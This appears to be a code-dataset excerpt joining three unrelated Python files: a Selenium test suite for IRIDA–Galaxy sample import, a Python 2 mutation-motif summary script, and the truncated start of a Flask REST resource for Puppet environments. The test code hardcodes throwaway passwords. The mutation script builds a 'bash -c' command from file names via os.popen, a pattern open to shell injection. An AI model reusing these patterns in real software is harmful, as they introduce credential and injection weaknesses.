            try:
                os.environ['IRIDA_GALAXY_TOOL_TESTS_DONT_STOP_GALAXY']
            except KeyError:
                print('Killing Galaxy')
                subprocess.Popen(self.GALAXY_STOP, cwd=self.GALAXY)
        try:
            os.environ['IRIDA_GALAXY_TOOL_TESTS_DONT_START_GALAXY']
        except KeyError:
            stop_galaxy()
            subprocess.call(self.GALAXY_DB_RESET, shell=True)
            subprocess.Popen(self.GALAXY_CMD, cwd=self.GALAXY)
            self.log.debug("Waiting for Galaxy database migration [%s]. Sleeping for [%s] seconds", self.GALAXY_URL,
                           self.GALAXY_SLEEP_TIME)
            time.sleep(self.GALAXY_SLEEP_TIME)
            self.log.debug("Galaxy database migration should have (hopefully) finished, checking if it is up")
        util.wait_until_up(
            self.GALAXY_DOMAIN,
            self.GALAXY_PORT,
            self.TIMEOUT)
        self.log.debug("Galaxy should now be up on [%s]", self.GALAXY_URL)

        def finalize_galaxy():
            stop_galaxy()
        request.addfinalizer(finalize_galaxy)
        self.register_galaxy(driver)
        self.configure_galaxy_api_key(driver)
        self.configure_tool('Galaxy', 'galaxy_url', self.GALAXY_URL)

    def test_galaxy_configured(self, setup_galaxy, driver):
        """Verify that Galaxy is accessible"""
        driver.get(self.GALAXY_URL)

    def test_irida_configured(self, setup_irida, driver):
        """Verify that IRIDA is accessible"""
        driver.get(self.IRIDA_URL)

    def test_tool_visible(self, setup_galaxy, driver):
        """Make sure there is a link to the tool in Galaxy"""
        driver.get(self.GALAXY_URL)
        driver.find_element_by_xpath("//div[@id='Get Data']/a[span[contains(text(), 'Get Data')]]").click()
        assert (driver.find_element_by_xpath("//a[contains(@class, 'irida_import')]"))

    def register_galaxy(self, driver):
        """Register with Galaxy, and then attempt to log in"""
        driver.get(self.GALAXY_URL)
        driver.find_element_by_link_text("Login or Register").click()
        driver.find_element_by_id("register-toggle").click()
        driver.find_element_by_name("email").send_keys(self.EMAIL)
        driver.find_element_by_name("password").send_keys("Password1")
        driver.find_element_by_name("confirm").send_keys(
            "Password1")
        driver.find_element_by_name("username").send_keys("irida-test")
        driver.find_element_by_name("create").click()
        # If the account already existed, fall back to a plain login.
        try:
            driver.get(self.GALAXY_URL)
            driver.find_element_by_link_text("Login or Register").click()
            driver.find_element_by_name("login").send_keys(self.EMAIL)
            driver.find_element_by_name("password").send_keys("Password1")
            driver.find_element_by_name("login").click()
        except NoSuchElementException:
            pass

    def configure_galaxy_api_key(self, driver):
        """Make a new Galaxy admin API key and configure the tool to use it"""
        gal = galaxy.GalaxyInstance(self.GALAXY_URL,
                                    email=self.EMAIL,
                                    password=self.GALAXY_PASSWORD)
        self.configure_tool('Galaxy', 'admin_key', gal.key)
        print('key:' + gal.key)

    def configure_tool(self, section, option, value):
        """Write tool configuration data"""
        config = configparser.ConfigParser()
        config.read(self.CONFIG_PATH)
        config.set(section, option, value)
        with open(self.CONFIG_PATH, 'w') as config_file:
            config.write(config_file)

    def register_irida(self, driver):
        """Register with IRIDA if neccessary, and then log in"""
        driver.get(self.IRIDA_URL)
        self.login_irida(driver, 'admin', 'password1')
        # Set a new password if necessary
        try:
            driver.find_element_by_name(
                "password").send_keys(self.IRIDA_PASSWORD)
            driver.find_element_by_name(
                "confirmPassword").send_keys(self.IRIDA_PASSWORD)
            driver.find_element_by_xpath("//button[@type='submit']").click()
        except NoSuchElementException:
            self.login_irida(driver, self.IRIDA_USER, self.IRIDA_PASSWORD)

    def login_irida(self, driver, username, password):
        """Log in to IRIDA (assumes the login page is opened by the driver)"""
        try:
            driver.find_element_by_name("username").send_keys(username)
            driver.find_element_by_name(
                "password").send_keys(password)
            driver.find_element_by_xpath("//button[@type='submit']").click()
        except NoSuchElementException:
            # If already logged in
            pass

    def add_irida_client_auth_code(self, driver):
        # Create the authorization-code OAuth client used by the Galaxy tool.
        driver.get(self.IRIDA_URL + '/clients/create')
        driver.find_element_by_id("clientId").send_keys(
            self.IRIDA_AUTH_CODE_ID)
        driver.find_element_by_id('authorizedGrantTypes').click()
        driver.find_element_by_xpath(
            "//*[contains(text(), 'authorization_code')]").click()
        driver.find_element_by_name("registeredRedirectUri").send_keys(self.IRIDA_REDIRECT_URI)
        driver.find_element_by_id("scope_auto_read").click()
        driver.find_element_by_id("create-client-submit").click()

    def add_irida_client_password(self, driver):
        # Create the password-grant OAuth client used by the test suite itself.
        driver.get(self.IRIDA_URL + '/clients/create')
        driver.find_element_by_id("clientId").send_keys(self.IRIDA_PASSWORD_ID)
        driver.find_element_by_id("scope_write").click()
        driver.find_element_by_id("create-client-submit").click()

    def get_irida_oauth(self, driver):
        # Build an OAuth2 session via the password grant.
        secret = self.get_irida_secret(driver, self.IRIDA_PASSWORD_ID)
        client = LegacyApplicationClient(self.IRIDA_PASSWORD_ID)
        irida_oauth = OAuth2Session(client=client)
        irida_oauth.fetch_token(
            self.IRIDA_TOKEN_ENDPOINT,
            username=self.IRIDA_USER,
            password=self.IRIDA_PASSWORD,
            client_secret=secret)
        return irida_oauth

    def get_irida_secret(self, driver, client_id):
        """Get an IRIDA client's secret given its client ID """
        driver.get(self.IRIDA_URL + '/clients')
        driver.find_element_by_xpath(
            "//*[contains(text(), '" + client_id + "')]").click()
        secret = driver.find_element_by_id(
            'client-secret').get_attribute('textContent')
        return secret

    def configure_irida_client_secret(self, driver):
        """Configure the client secret for the tool"""
        secret = self.get_irida_secret(driver, self.IRIDA_AUTH_CODE_ID)
        # It is assumed that the tests are being run from the repo's tool
        # directory:
        self.configure_tool('IRIDA', 'client_secret', secret)

    def get_href(self, response, rel):
        """From a Requests response from IRIDA, get a href given a rel"""
        links = response.json()['resource']['links']
        href = next(link['href'] for link in links if link['rel'] == rel)
        return href

    def test_project_samples_import_single_end(self, setup_irida, setup_galaxy,
                                               driver, tmpdir):
        """Verify that sequence files can be imported from IRIDA to Galaxy"""
        # Seed IRIDA with a project holding two samples (three fastq files).
        irida = setup_irida
        project_name = 'ImportProjectSamples'
        project = irida.post(self.IRIDA_PROJECTS,
                             json={'name': project_name})
        samples = self.get_href(project, 'project/samples')
        sample1 = irida.post(samples, json={'sampleName': 'PS_Sample1',
                                            'sequencerSampleId': 'PS_1'})
        sequences1 = self.get_href(sample1, 'sample/sequenceFiles')
        # Pytest manages the temporary directory
        seq1 = tmpdir.join("seq1.fastq")
        seq1.write(self.FASTQ_CONTENTS)
        irida.post(sequences1, files={'file': open(str(seq1),
                                                   'rb')})
        seq2 = tmpdir.join("seq2.fastq")
        seq2.write(self.FASTQ_CONTENTS)
        irida.post(sequences1, files={'file': open(str(seq2),
                                                   'rb')})
        sample2 = irida.post(samples, json={'sampleName': 'PS_Sample2',
                                            'sequencerSampleId': 'PS_2'})
        sequences2 = self.get_href(sample2, 'sample/sequenceFiles')
        seq3 = tmpdir.join("seq3.fastq")
        seq3.write(self.FASTQ_CONTENTS)
        irida.post(sequences2, files={'file': open(str(seq3),
                                                   'rb')})
        # Export to Galaxy using the button on the dropdown menu
        driver.get(self.GALAXY_URL)
        history_panel = driver.find_element_by_id('current-history-panel')
        initially_succeeded = len(history_panel.find_elements_by_class_name(
            'state-ok'))
        driver.find_element_by_xpath("//div[@id='Get Data']/a[span[contains(text(), 'Get Data')]]").click()
        driver.find_element_by_xpath("//a[contains(@class, 'irida_import')]").click()
        # Sometimes a login is required
        try:
            self.login_irida(driver, self.IRIDA_USER, self.IRIDA_PASSWORD)
        except NoSuchElementException:
            pass
        # Pick the last matching project on this page
        driver.find_elements_by_link_text(project_name)[-1].click()
        # These checkbox elements cannot be clicked directly
        # Using IDs would complicate running the tests without restarting IRIDA
        # Retry for up to ~60s while the samples table re-renders.
        stale = True
        timeout = 0
        while stale:
            try:
                checkboxes = driver.find_elements_by_xpath(
                    "//table[contains(@id, 'samplesTable')]/tbody/tr/td[1]/input[@type='checkbox']")
                checkboxes[0].click()
                checkboxes[1].click()
                stale = False
            except (StaleElementReferenceException, NoSuchElementException):
                time.sleep(1)
                timeout += 1
                if timeout == 60:
                    raise
        driver.find_element_by_id("cart-add-btn").click()
        driver.find_element_by_id("cart-show-btn").click()
        email_input = driver.find_element_by_xpath("//form[contains(@class, 'ant-form')]//input[@type='text']")
        email_input.clear()
        email_input.send_keys(self.EMAIL)
        # Click "Export Samples to Galaxy" button
        driver.find_element_by_xpath("//button[span[text()='Export Samples to Galaxy']]").click()
        WebDriverWait(driver, self.WAIT).until(
            EC.presence_of_element_located((By.ID, 'current-history-panel'))
        )
        time.sleep(120)  # Wait for import to complete
        # Success criterion: at least one new "ok" dataset in the history.
        history_panel = driver.find_element_by_id('current-history-panel')
        succeeded = len(history_panel.find_elements_by_class_name('state-ok'))
        assert succeeded - initially_succeeded > 0, \
            "Import did not complete successfully"
| 18,797 | 6,054 |
## This code was developed and authored by Les Klimczak, Ph.D.
## Unauthorized commercial reuse of the code and removal of this notice
## are prohibited.
## This research was supported by the Intramural Research Program of the NIH,
## National Institute of Environmental Health Sciences.
import os, re, sys, copy, numpy, datetime, __builtin__
# First CLI argument: directory holding the helper scripts / input files.
FILESDIR = sys.argv[1]
# Python 2 ``execfile`` pulls findMotifs.py's names (e.g. ``findTitles``)
# into this module's global namespace.
execfile(sys.argv[1] + "findMotifs.py")
time40 = datetime.datetime.now()  # run start timestamp -- presumably for timing; TODO confirm
def which(tf):
    """Return the indices of truthy elements of *tf* (R-style ``which``).

    Relies on Python 2 ``filter`` returning a list.
    """
    return filter(lambda x: tf[x], range(len(tf)))
#def all(tf):
# return reduce(lambda x, y: x&y, tf)
def duplicated(list):
    """Return a parallel list of booleans (R-style ``duplicated``).

    Element i is True iff list[i] already appeared at an earlier index.
    Uses list membership, so elements need not be hashable.
    """
    flags = []
    seen = []
    for item in list:
        is_repeat = item in seen
        flags.append(is_repeat)
        if not is_repeat:
            seen.append(item)
    return flags
def ifelse(test, yes, no):
    """R-style conditional helper: *yes* when *test* is truthy, else *no*."""
    return yes if test else no
OLDEXT = "_anz4.txt"
# Batch mode flag; the second assignment deliberately wins (currently off).
BATCH = True
BATCH = False
#CLUSTERANZ = True
CLUSTERANZ = False
if CLUSTERANZ:
    OLDEXT = "_cluster.txt"
ORIGDIR = "/data/PCAWG_12oct_passonly/MAF_2583/histology_split/A3A_A3B/res_ytCa/"
# Motif tag derived from the results directory name (text after ".../res").
motifString = re.sub('.*/res', '', ORIGDIR)[:-1]
sumTitles = ["Sample","A_T_coord_clusters", "G_C_coord_clusters", "Non_coord_clusters", "clusters","mutations", "complex","insertions", "deletions", "indels", "substitutions", "bases"]
# For each reference base, the three bases it can be substituted to.
substTo = {'A':("T","G","C"),'T':("A","C","G"),'G':("C","T","A"),'C':("G","A","T")}
colTitles = []
# Build one output column per motif/substitution combination from the motif
# titles loaded by findMotifs.py (``findTitles``).
for title in findTitles:
    if (len(title)==1):
        mutBase = title
    else:
        # The first character with ASCII code < 90 marks the mutated base.
        # NOTE(review): this accepts 'A'-'Y' but excludes 'Z' (ord 90) --
        # confirm motif titles never use 'Z' as the mutated-base marker.
        mutBase = title[which([x<90 for x in [ord(x) for x in title]])[0]]
    for base in substTo[mutBase]:
        # NOTE(review): substTo never maps a base to itself, so this guard
        # appears to be dead code kept for safety.
        if (base==mutBase):
            continue
        colTitle = title + "_to_" + base
        colTitles.append(colTitle)
    colTitles.extend((title, title.lower()))
    if (len(title)>1):
        colTitles.extend((title + "_per_mut", title + "_per_" + mutBase, title.lower() + "_per_" + mutBase.lower(), "enrich_" + title, "freq_" + title, "reliable>=30"))
headers = sumTitles + colTitles
numCols = len(headers)
totals = [0] * numCols
numFixedCols = 32
def newCounter(type, subtype, sumTitle, sumSubtitle, typeColumn, typeValue, subtypeColumn, subtypeValue, subtypeComparison):
    """Closure-based counter "object" (translated from R), one per summary rule.

    Filters input rows by a type column/value (and optional subtype condition),
    accumulates per-sample mutation/cluster/motif counts, and writes one
    summary output file. Returns a dict of bound functions acting as methods;
    single-element lists (e.g. mutations[0]) emulate mutable closed-over state,
    since this Python 2 code predates `nonlocal`.
    """
    # Self-assignments kept from the mechanical R translation; they are no-ops.
    type = type
    subtype = subtype
    sumTitle = sumTitle
    sumSubtitle = sumSubtitle
    typeColumn = typeColumn
    typeValue = typeValue
    # A comma in the second character marks a comma-separated list of values.
    if (typeValue[1:2]==","):
        typeValue = typeValue.split(",")
    subtypeColumn = subtypeColumn
    subtypeValue = subtypeValue
    subtypeComparison = subtypeComparison
    # Numeric comparisons need an int threshold; other kinds compare strings.
    if ((subtypeComparison=="equal") or (subtypeComparison=="greater")):
        subtypeValue = int(subtypeValue)
    # Mutable closure state (one-element lists so nested defs can rebind).
    typeField = [0]
    subtypeField = [0]
    # 07/15/16 counters replaced with variants
    variants = [{}]
    complex = [{}]
    clusters = [{}]
    mutations = [0]
    mutList = [{}]
    baseList = [{}]
    baseCountList = [{}]
    totals = [0] * numCols
    output = [""]
    def initOutput(inputPref):
        """Open this counter's summary file and write the header lines."""
        if (type=='99'):
            # Type 99 is the catch-all "All Mutations" summary.
            typeString = "_" + sumSubtitle
            outputFile = inputPref + "_sum" + typeString + ".txt"
        else:
            typeString = "%02d" % int(type)
            outputFile = inputPref + "_sum" + typeString + subtype + ".txt"
        #if (file.exists(outputFile)) next
        output[0] = open(outputFile, "w")
        if (type!='99'):
            output[0].write("#" + sumTitle + " " + sumSubtitle + "\n")
        output[0].write('\t'.join(headers) + "\n")
    def closeOutput():
        output[0].close()
    def initFieldNames(fieldNames):
        """Resolve the type/subtype column names to field indices."""
        typeField[0] = which([x==typeColumn for x in fieldNames])
        if (typeField[0]):
            typeField[0] = typeField[0][0]
        subtypeField[0] = which([x==subtypeColumn for x in fieldNames])
        if (subtypeField[0]):
            subtypeField[0] = subtypeField[0][0]
        #print type, subtype, typeColumn, typeField[0], subtypeField[0]
    def initCounters(mutList0, baseList0, baseCountList0):
        """Reset all per-sample accumulators (deep copies of the templates)."""
        variants[0] = {}
        complex[0] = {}
        clusters[0] = {}
        mutations[0] = 0
        mutList[0] = copy.deepcopy(mutList0)
        baseList[0] = copy.deepcopy(baseList0)
        baseCountList[0] = copy.deepcopy(baseCountList0)
    def count(fields):
        """Accumulate one input row into this counter, if it matches the rule."""
        # Row filtering: "All Mutations" accepts everything, otherwise the
        # type column must match typeValue (scalar or list).
        if (sumTitle!="All Mutations"):
            #if (not any([x==typeValue for x in fields])):
            if (__builtin__.type(typeValue) is list):
                if (not any([x==fields[typeField[0]] for x in typeValue])):
                    return
            else:
                if (not fields[typeField[0]]==typeValue):
                    return
            # Optional secondary condition on the subtype column.
            if subtypeField[0]!=[]:
                if ((subtypeComparison=="equal") or (subtypeComparison=="greater")):
                    subtypeFieldValue = int(fields[subtypeField[0]])
                else:
                    subtypeFieldValue = fields[subtypeField[0]]
                if (not compare(subtypeFieldValue, subtypeValue, subtypeComparison)):
                    return
        #if (True):
        #if (type=="10"):
        #if ((type!="10")&(fields[typeField]!="N")) {
        #	print lnum, type, subtype, subtypeColumn, subtypeField[0]
        #	typeField, subtypeField
        #}
        # Tally variant types for non-complex rows (complex events counted separately).
        if (not variants[0].has_key(fields[VARIANT_TYPE_FIELD]) and (fields[COMPLEX_ID_FIELD]=="")):
            (variants[0])[fields[VARIANT_TYPE_FIELD]] = 1
        else:
            if (fields[COMPLEX_ID_FIELD]==""):
                (variants[0])[fields[VARIANT_TYPE_FIELD]] = (variants[0])[fields[VARIANT_TYPE_FIELD]] + 1
        # Remember each cluster's coordination base (dict de-duplicates IDs).
        if (fields[CLUSTER_ID_FIELD]!=""):
            (clusters[0])[fields[CLUSTER_ID_FIELD]] = fields[CLUSTER_COORD_FIELD]
        if (fields[COMPLEX_ID_FIELD]!=""):
            (complex[0])[fields[COMPLEX_ID_FIELD]] = fields[COMPLEX_ID_FIELD]
            #cat("c", fields[COMPLEX_ID_FIELD], "c")
        # 04/15/14 change to all non-complex rows
        if (fields[COMPLEX_ID_FIELD]==""):
            mutations[0] = mutations[0]+1
        if ((fields[COMPLEX_ID_FIELD]=="") and (fields[VARIANT_TYPE_FIELD]=="SNP")):
            # 04/15/14 change to all non-complex rows
            #mutations <- mutations+1
            # For every motif whose indicator column is "1" in this row, count
            # the substitution toward mutList[motif][altBase].
            #		for (title in findTitles[as.logical(as.numeric(fields[fieldNames %in% findTitles]))]) {
            for title in [findTitles[x] for x in which([bool(x) for x in [int(x) for x in [fields[x] for x in which([x in findTitles for x in fieldNames])]]])]:
                mutationCount = (mutList[0])[title][fields[TUMOR_SEQ_ALLELE2_FIELD]]
                (mutList[0])[title][fields[TUMOR_SEQ_ALLELE2_FIELD]] = mutationCount + 1
            # Accumulate genome motif-occurrence counts carried on each row.
            #baseCounts <- as.numeric(fields[fieldNames %in% countTitles])
            baseCounts = [int(x) for x in [fields[x] for x in uniqueFieldNumbers]]
            for i in range(len(baseCounts)):
                (baseCountList[0])[uniqueFieldNames[i]] = (baseCountList[0])[uniqueFieldNames[i]] + baseCounts[i]
        else:
            # Progress marker for complex / non-SNP rows.
            sys.stdout.write("X")
    def writeSampleSum():
        """Emit one summary row for the sample just finished and fold it into totals."""
        print " writing sample in row", lnum
        # Collapse the complex-event dict to its count.
        complex[0] = len((complex[0]).keys())
        # translated ifelse won't work b/c it's trying to evaluate the False option
        if (variants[0].has_key("INS")):
            insertions = variants[0]["INS"]
        else:
            insertions = 0
        if (variants[0].has_key("DEL")):
            deletions = variants[0]["DEL"]
        else:
            deletions = 0
        if (variants[0].has_key("SNP")):
            substitutions = variants[0]["SNP"]
        else:
            substitutions = 0
        # 04/15/14 change to all rows
        #mutations <- mutations + complex + insertions + deletions
        mutations[0] = mutations[0] + complex[0]
        # Count clusters by coordination base (A/T vs G/C vs N).
        coordBases = {'A':0, 'T':0, 'G':0, 'C':0, 'N':0}
        # iterates over keys, not values like R
        for key in clusters[0]:
            coordBases[clusters[0][key]] = coordBases[clusters[0][key]] + 1
        # NOTE(review): "bases" = substitutions*41 — presumably a fixed 41-base
        # window per substitution; confirm against the pipeline definition.
        genCounts = (coordBases["A"] + coordBases["T"], coordBases["G"] + coordBases["C"], coordBases["N"], len(clusters[0].keys()), mutations[0], complex[0], insertions, deletions, insertions+deletions, substitutions, substitutions*41)
        #print genCounts
        substCounts = [sampleID]
        substCounts.extend(genCounts)
        # Per-motif columns: substitution counts, totals, and derived ratios.
        for title in findTitles:
            motifCounts = []
            #print(title)
            if (len(title)==1):
                mutBase = title
            else:
                mutBase = title[which([x<90 for x in [ord(x) for x in title]])[0]]
            mutBaseSum = 0
            #for (base in c("A", "T", "G", "C")) {
            for base in substTo[mutBase]:
                if (base==mutBase):
                    continue
                baseSubstCount = mutList[0][title][base]
                motifCounts.extend([baseSubstCount])
                mutBaseSum = mutBaseSum + baseSubstCount
            motifCountName = title.lower() + "_counts"
            totMotifCount = baseCountList[0][motifCountName]
            motifCounts.extend([mutBaseSum, totMotifCount])
            if (len(title)==1):
                # Single-base "motif": remember its mutation total for ratios below.
                baseList[0][mutBase] = mutBaseSum
            else:
                # Enrichment = (motif mutations / base mutations) normalized by
                # (motif occurrences / base occurrences) in the genome context.
                mutMotifperMut = numpy.float64(mutBaseSum)/baseList[0][mutBase]
                totMotifperBase = numpy.float64(totMotifCount)/baseCountList[0][mutBase.lower() + "_counts"]
                reliable = (mutBaseSum >= 30)*1
                #print mutations[0], mutBaseSum, totMotifperBase, totMotifCount
                motifCounts.extend((numpy.float64(mutBaseSum)/mutations[0], mutMotifperMut, totMotifperBase, numpy.float64(mutMotifperMut)/totMotifperBase, numpy.float64(mutBaseSum)/totMotifCount, reliable))
            #print(motifCounts)
            substCounts.extend(motifCounts)
        # Accumulate every numeric column into the running totals.
        totals[1:(numCols)] = [x+y for x,y in zip(totals[1:(numCols)], (substCounts[1:(numCols)]))]
        outLine = substCounts[0] + '\t' + '\t'.join([x.__str__() for x in substCounts[1:(numCols)]]) + "\n"
        output[0].write(outLine.replace('nan', 'NaN'))
        #cat(substCounts, "\n")
    # Number of fixed (non-motif) columns preceding the per-motif blocks.
    fixedCols = 32
    def writeTotals():
        """Recompute the ratio columns from summed counts and write the Totals row."""
        t = 0
        for title in findTitles:
            if (len(title)==1):
                continue
            else:
                mutBase = title[which([x<90 for x in [ord(x) for x in title]])[0]]
            # Each multi-char motif occupies 11 columns after the fixed block.
            colOffset = fixedCols + t*11
            titleTotals = [0]*10
            titleTotals[0:5] = totals[(colOffset):(colOffset+5)]
            titleTotals[5] = numpy.float64(titleTotals[3])/totals[which([x=="mutations" for x in headers])[0]]
            titleTotals[6] = numpy.float64(titleTotals[3])/totals[which([x==mutBase for x in headers])[0]]
            titleTotals[7] = numpy.float64(titleTotals[4])/totals[which([x==mutBase.lower() for x in headers])[0]]
            titleTotals[8] = numpy.float64(titleTotals[6])/titleTotals[7]
            titleTotals[9] = numpy.float64(titleTotals[3])/titleTotals[4]
            totals[(colOffset):(colOffset+10)] = titleTotals
            t = t + 1
        totals[0] = "Totals"
        outLine = "\t".join([x.__str__() for x in totals]) + "\n"
        output[0].write(outLine.replace('nan', 'NaN'))
        # Reset totals for the next input file.
        totals[0:(numCols)] = [0] * numCols
    def getValues():
        return (type, subtype, sumTitle, typeValue)
    # The returned dict is the counter's public interface ("methods").
    return {'type':type, 'getValues':getValues, 'initOutput':initOutput, 'closeOutput':closeOutput, 'initFieldNames':initFieldNames, 'initCounters':initCounters, 'count':count, 'mutList':mutList, 'writeSampleSum':writeSampleSum, 'writeTotals':writeTotals}
# One counter "object" per summary rule, built from the rules file below.
countersList = []
#countersList[2]['getValues']()
rulesFile = "SummaryRulesIntegr1.txt"
# special 12/13/17
#rulesFile = "SummaryRules5d.txt"
#rulesTable = read.table(rulesFile, header=TRUE, stringsAsFactors=FALSE, sep="\t")
rInput = open(rulesFile, "r")
# First readline consumes the rules-file header row before the loop below.
line = rInput.readline()
# switch(type, equal=x==y, greater=x>y, isNonBlank=(x!=""), isAny=TRUE)
def compare(x, y, type):
    """Apply the comparison named by `type` ('equal', 'greater', 'isNonBlank',
    'isAny') to x and y, mirroring the R switch() in the comment above.

    Fixed: the original built a dict literal, eagerly evaluating EVERY branch
    for every call — so e.g. requesting 'equal' on a str/int pair would still
    compute `x > y`, which raises TypeError on Python 3. The if/elif chain
    evaluates only the requested comparison; unknown kinds still raise
    KeyError, matching the original's dict lookup.
    """
    if type == 'equal':
        return x == y
    if type == 'greater':
        return x > y
    if type == 'isNonBlank':
        return x != ""
    if type == 'isAny':
        return True
    raise KeyError(type)
sumCount = 0
# Build one counter per non-empty rules line; columns are:
# type, subtype, sumTitle, sumSubtitle, typeColumn, typeValue,
# subtypeColumn, subtypeValue, subtypeComparison.
while (True):
    line = rInput.readline().rstrip('\r\n')
    if (not line):
        break
    fields = line.split("\t")
    countersList.append(newCounter(fields[0], fields[1], fields[2], fields[3], fields[4], fields[5], fields[6], fields[7], fields[8]))
    sumCount = sumCount + 1
rInput.close()
files = os.listdir(FILESDIR)
#files = [os.listdir(FILESDIR)[3]]
#file = "2014_Fredriksson_HNSC_27_WGS_mutations_adjusted_anz1_NOrepeats_sorted_anz4.txt"
# Main driver: for every *_anz4.txt input, stream its rows through all
# counters, writing one summary row per sample and a Totals row per file.
for file in files:
    if (file[-len(OLDEXT):]!=OLDEXT):
        continue
    if (BATCH):
        # Restrict to one histology cohort when batch mode is enabled.
        batchNames = ("BLCA", "BRCA", "HNSC", "LUAD", "LUSC")
        batchSubset = 2
        # NOTE(review): `not in batchNames[batchSubset]` is a substring test
        # against "HNSC", not tuple membership — confirm this is intended.
        if (file.split("_")[2] not in batchNames[batchSubset]):
            continue
    print(file)
    #print("\n" + file + "\n")
    inputFile = FILESDIR + file
    inputPref = inputFile[:-len(OLDEXT)]
    if CLUSTERANZ:
        # Cluster mode: paste the original anz4 columns with the clusterDEF
        # columns via a shell pipeline instead of reading the file directly.
        sys.stderr.write("Using clusterDEF file\n")
        #origAnz4 = ORIGDIR + re.sub('_anz2.*', '', file) + '_anz4.txt'
        origAnz4 = ORIGDIR + re.sub('_anz2.*', '', file) + motifString + '_anz4.txt'
        inputPref = inputPref + motifString
        #input = os.popen('cut -f1-77 ' + origAnz4)
        # 68 - last anz4 col; 2 - first clusterDef col; 9 - first+9-1
        #input = os.popen('bash -c "paste <(cut -f1-68 ' + origAnz4 + ')' + ' <(cut -f2-9 ' + inputFile + ')"')
        # for tCw
        #input = os.popen('bash -c "paste <(cut -f1-69 ' + origAnz4 + ')' + ' <(cut -f3-11 ' + inputFile + ')"')
        # for tCa: 62, rtCa: 63
        input = os.popen('bash -c "paste <(cut -f1-63 ' + origAnz4 + ')' + ' <(cut -f3-11 ' + inputFile + ')"')
    else:
        input = open(inputFile, "r")
    # Skip leading "#" comment lines; the first non-comment line is the header.
    line = input.readline()
    firstChar = line[:1]
    while firstChar=="#":
        line = input.readline()
        firstChar = line[:1]
    fieldNames = line[:-1].split("\t")
    # Resolve the well-known column indices from the header.
    VARIANT_TYPE_FIELD = which(map(lambda(x): x=='Variant_Type', fieldNames))[0]
    TUMOR_SEQ_ALLELE2_FIELD = which(map(lambda(x): x=='Tumor_Seq_Allele2', fieldNames))[0]
    COMPLEX_ID_FIELD = which(map(lambda(x): x=='Complex_ID', fieldNames))[0]
    CLUSTER_ID_FIELD = which(map(lambda(x): x=='Dataset_Cluster_ID', fieldNames))[0]
    CLUSTER_COORD_FIELD = which(map(lambda(x): x=='Cluster_Coordination', fieldNames))[0]
    INPUT_SAMPLE_FIELD = which(map(lambda(x): x=='Tumor_Sample_Barcode', fieldNames))[0]
    # Indices/names of the first occurrence of each motif-count column.
    #uniqueFieldNumbers <- (fieldNames %in% countTitles) & !duplicated(fieldNames)
    #uniqueFieldNames <- fieldNames[uniqueFieldNumbers]
    tf1 = map(lambda x: x in countTitles, fieldNames)
    tf2 = map(lambda x: not x, duplicated(fieldNames))
    uniqueFieldNumbers = which(map(lambda x: tf1[x] and tf2[x], range(len(fieldNames))))
    uniqueFieldNames = map(lambda(x): fieldNames[x], uniqueFieldNumbers)
    # Template accumulators handed to each counter's initCounters (deep-copied there).
    mutList = dict(zip(findTitles, [0]*len(findTitles)))
    baseList = {'A': 0, 'T':0, 'G':0, 'C':0}
    for key in mutList.keys():
        mutList[key] = dict(baseList)
    baseCountList = dict(zip(uniqueFieldNames, [0]*len(uniqueFieldNames)))
    print("Initializing...")
    for sumNum in range(sumCount):
        countersList[sumNum]['initOutput'](inputPref)
        countersList[sumNum]['initFieldNames'](fieldNames)
        countersList[sumNum]['initCounters'](mutList,baseList,baseCountList)
    print("Counting...")
    sampleID = ""
    firstSample = True
    lnum = 0
    # Row loop: rows are grouped by sample; a sample-ID change (or EOF/blank
    # line) flushes the finished sample's summary row.
    while (True):
    #while (lnum<1000):
        line = input.readline()
        if (not line):
            # EOF: flush the final sample, write totals, close outputs.
            for sumNum in range(sumCount):
                countersList[sumNum]['writeSampleSum']()
                countersList[sumNum]['writeTotals']()
                countersList[sumNum]['closeOutput']()
            print "End: not line"
            break
        lnum = lnum+1
        if (lnum%1000==0):
            sys.stdout.write('.')
        fields = line.split("\t")
        if (all(map(lambda(x): x=="", fields))):
            # An all-empty row also terminates the file.
            for sumNum in range(sumCount):
                countersList[sumNum]['writeSampleSum']()
                countersList[sumNum]['writeTotals']()
                countersList[sumNum]['closeOutput']()
            print "End: empty fields"
            break
        if (fields[INPUT_SAMPLE_FIELD]!=sampleID):
            # New sample: write the previous one (unless this is the first).
            if (not firstSample):
                for sumNum in range(sumCount):
                    print("Writing %d" % sumNum)
                    countersList[sumNum]['writeSampleSum']()
                    countersList[sumNum]['initCounters'](mutList,baseList,baseCountList)
            firstSample = False
            sampleID = fields[INPUT_SAMPLE_FIELD]
            print(sampleID)
        for sumNum in range(sumCount):
            countersList[sumNum]['count'](fields)
    input.close()
print
for sumNum in range(sumCount):
    print countersList[sumNum]['getValues']()
# Clean up the generated findMotifs.py loaded at startup.
os.remove(sys.argv[1] + "findMotifs.py")
time50 = datetime.datetime.now()
print(time50 - time40)
| 14,822 | 6,334 |
from flask_restful import Resource
from flask import jsonify, request
from app.puppenc import api, db, app, auth, PuppencResource
from app.decorators import *
from app.environments.models import Environment
from app.environments.schema import EnvironmentSchema
class Environments(PuppencResource):
    """REST resource for Puppet environments (CRUD via flask_restful).

    All heavy lifting (lookup, validation, persistence) is done by the
    decorators from app.decorators; several handlers are therefore `pass`.
    """
    def __init__(self):
        # Marshmallow schemas: one for single objects, one for collections.
        # NOTE(review): PuppencResource.__init__ is not chained here — confirm
        # the base class needs no initialisation.
        self.environment_schema = EnvironmentSchema()
        self.environments_schema = EnvironmentSchema(many=True)
    @auth.login_required
    @get_item(Environment)
    def get(self, id=None):
        """
        @api {get} /environments Get all environments
        @apiName get_environments
        @apiGroup Environments
        @apiVersion 1.0.0
        @apiPermission user
        @apiParam {String} [limit=10] (query parameter) Objects per page to display. Use limit=0 for disabling limit
        @apiParam {String} [page=1] (query parameter) Current page
        @apiParam {String} [filter] (query parameter) Filter on name parameter (use * for searching any strings. Ex: *maclass*)
        @apiSuccess {Number} id The environment's id
        @apiSuccess {String} name The environment's name
        @apiSuccess {Array} nodes The environment's nodes (by id)
        @apiSuccess {Datetime} insert_date The environment's inserted date
        @apiSuccess {Datetime} update_date The environment's updated date
        @apiSuccess {Datetime} delete_date The environment's deleted date
        @apiExample {curl} Example usage :
            curl -X GET -u user:pwd http://127.0.0.1:5000/api/v1/environments
        @apiSuccessExample {json} Success-Response:
            HTTP/1.0 200 OK
            [
              {
                "delete_date": null,
                "id": 1,
                "insert_date": "2017-04-11T13:56:03+00:00",
                "name": "stable",
                "nodes": [
                  104,
                  2582,
                  2588
                ],
                "update_date": null
              },
              {
                "delete_date": null,
                "id": 2,
                "insert_date": "2017-04-11T13:56:04+00:00",
                "name": "staging",
                "nodes": [
                  8,
